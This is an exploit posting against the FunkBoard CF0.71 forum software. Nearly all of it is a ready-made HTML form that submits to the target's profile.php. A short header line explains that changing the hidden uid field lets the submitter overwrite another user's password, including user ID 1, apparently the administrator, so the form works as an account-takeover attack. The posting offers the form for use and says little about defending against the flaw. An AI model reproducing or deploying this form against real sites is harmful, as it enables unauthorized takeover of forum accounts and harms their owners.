# Title : FunkBoard CF0.71 (profile.php) Remote User Pass Change Exploit
# Author : ajann REMOTE USER PASS CHANGE EXPLOİT; Change: <input type="hidden" name="uid" value="1"> => ID AND action *********************************************************************************************************************************** <form ENCTYPE="multipart/form-data" action="http://[target]/[path]/profile.php"; method="POST"> <table cellspacing="1" cellpadding="2" border="0" width="100%"> <th colspan="4" bgcolor="#003366"> <b><span class="ms"><font color="#FFbb33">Profile</font></span></b> </th> <tr> <td bgcolor="#888888" valign="top" width="20%"> <b>User Name</b> </td> <td bgcolor="#BBBBBB" colspan="3"> ajann </td> </tr> <tr> <td bgcolor="#888888" valign="top" width="20%"> <b>Membership Number</b> </td> <td bgcolor="#BBBBBB" colspan="3"> 247 </td> </tr> <tr> <td bgcolor="#888888" valign="top" width="20%"> <b>First Registered</b> </td> <td bgcolor="#BBBBBB" colspan="3"> Sat 03 Jun 2006 at 09:20:14 pm </td> </tr> <tr> <td bgcolor="#888888" valign="top" width="20%"> <b>Last Login</b> </td> <td bgcolor="#BBBBBB" colspan="3"> Sat 03 Jun 2006 at 09:21:45 pm </td> </tr> <tr> <td bgcolor="#888888" valign="top" width="20%"> <b>Number of posts</b> </td> <td bgcolor="#BBBBBB" colspan="3"> 0 </td> </tr> <tr> <td bgcolor="#888888" valign="top" width="20%"> <b>Status</b> </td> <td bgcolor="#BBBBBB" colspan="3"> Member </td> </tr> <th colspan="4" bgcolor="#003366"> <b><span class="ms"><font color="#FFbb33">Entries marked with a * are required</font></span></b> </th> <tr> <td bgcolor="#888888" valign="top" width="20%"> <b>User Name</b> <font color="#ff0000">*</font> </td> <td bgcolor="#BBBBBB" colspan="3"> <input size="30" name="rname" value="ajann"> </td> </tr> <tr> <td bgcolor="#888888" valign="top"> <b>Your Name</b> </td> <td bgcolor="#BBBBBB" colspan="3"> <input size="30" name="realname" value="ajann"> </td> </tr> <tr> <td bgcolor="#888888" valign="top" width="20%"> <b>Password</b> <font color="#ff0000">*</font> </td> <td bgcolor="#BBBBBB" colspan="3"> <input type="password" size="30" name="pass" value="8ebOZmF5pe"> </td> </tr> <tr> <td bgcolor="#888888" valign="top"> <b>Confirm Password</b> <font color="#ff0000">*</font> </td> <td bgcolor="#BBBBBB" colspan="3"> <input type="password" size="30" name="cpass" value="8ebOZmF5pe"> </td> </tr> <tr> <td bgcolor="#888888" valign="top"> <b>E-mail</b> <font color="#ff0000">*</font> </td> <td bgcolor="#BBBBBB" colspan="3"> <input size="30" name="fmail" value="[EMAIL PROTECTED]"> Hide Email Address? <input type='radio' name='priv' value='yes'>Yes <input type='radio' name='priv' value='no' CHECKED>No</P> </td> </tr> <tr> <td bgcolor="#888888" valign="top"> Prefered Language </td> <td bgcolor="#BBBBBB" colspan="3"> <select name="newlang"> <option value='dutch.flf'>dutch</option><option value='english.flf' SELECTED>english</option> </select> </td> </tr> <tr> <td bgcolor="#888888" valign="top"> Homepage </td> <td bgcolor="#BBBBBB" colspan="3"> <input size="30" name="www" value=""> </td> </tr> <tr> <td bgcolor="#888888" valign="top"> ICQ </td> <td bgcolor="#BBBBBB" colspan="3"> <input size="30" name="icq" value=""> </td> <tr> <td bgcolor="#888888" valign="top"> AOL Instant Messenger (AIM) </td> <td bgcolor="#BBBBBB" colspan="3"> <input size="30" name="aim" value=""> </td> </tr> <tr> <td bgcolor="#888888" valign="top"> Yahoo Instant Messenger (YIM) </td> <td bgcolor="#BBBBBB" colspan="3"> <input size="30" name="yim" value=""> </td> </tr> <tr> <td bgcolor="#888888" valign="top"> Location<font color='#ff0000'>*</font> </td> <td bgcolor="#BBBBBB" colspan="3"> <input size="30" name="location" value="asdsadasdasd"> </td> </tr> <tr> <td bgcolor="#888888" valign="top"> Hobbies/Interests </td> <td bgcolor="#BBBBBB" colspan="3"> <input size="90" name="interebbies" value=""> </td> </tr> <tr> <td bgcolor="#888888" valign="top"> Gender (M/F) </td> <td bgcolor="#BBBBBB" colspan="3"> <input size="1" name="sex" value=""> </td> </tr> <tr> <td bgcolor="#888888" valign="top"> Date of Birth </td> <td bgcolor="#BBBBBB" colspan="3"> <select name="dobday"> <option SELECTED>1</option> <option>2</option> <option>3</option> <option>4</option> <option>5</option> <option>6</option> <option>7</option> <option>8</option> <option>9</option> <option>10</option> <option>11</option> <option>12</option> <option>13</option> <option>14</option> <option>15</option> <option>16</option> <option>17</option> <option>18</option> <option>19</option> <option>20</option> <option>21</option> <option>22</option> <option>23</option> <option>24</option> <option>25</option> <option>26</option> <option>27</option> <option>28</option> <option>29</option> <option>30</option> <option>31</option> </select> <select name="dobmonth"> <option value="1" SELECTED >January</option> <option value="2">February</option> <option value="3">March</option> <option value="4">April</option> <option value="5">May</option> <option value="6">June</option> <option value="7">July</option> <option value="8">August</option> <option value="9">September</option> <option value="10">October</option> <option value="11">November</option> <option value="12">December</option> </select> <input size="4"name="dobyear" value=""> </td> </tr> <tr> <td bgcolor="#888888" valign="top"> Signature (< 100 characters) </td> <td bgcolor="#BBBBBB" colspan="3"> <textarea wrap="virtual" name="sig" rows="3" cols="35"> </textarea> </td> </tr> <tr> <td bgcolor="#888888" valign="top"> Use an Avatar ? </td> <td bgcolor="#BBBBBB"> Current Avatar - <input type="hidden" name="avatar" value="No Avatar"> No Avatar <input type="submit" name="action" value="Select Avatar"></td> </tr> <tr> <td bgcolor="#888888" valign="top"> Upload Avatar ?<br>(GIF, JPG or PNG only) </td> <td bgcolor="#BBBBBB"> <INPUT TYPE="FILE" NAME="userfile" SIZE="35"> <input type="hidden" name="MAX_FILE_SIZE" value="5242880"> </td> </tr> <tr> <td bgcolor="#888888" valign="top"> <b>Submit</b> </td> <td bgcolor="#BBBBBB" colspan="3"> <input type="hidden" name="uid" value="1"> <input type="submit" name="action" value="Edit Profile"> </td> </tr> </form>
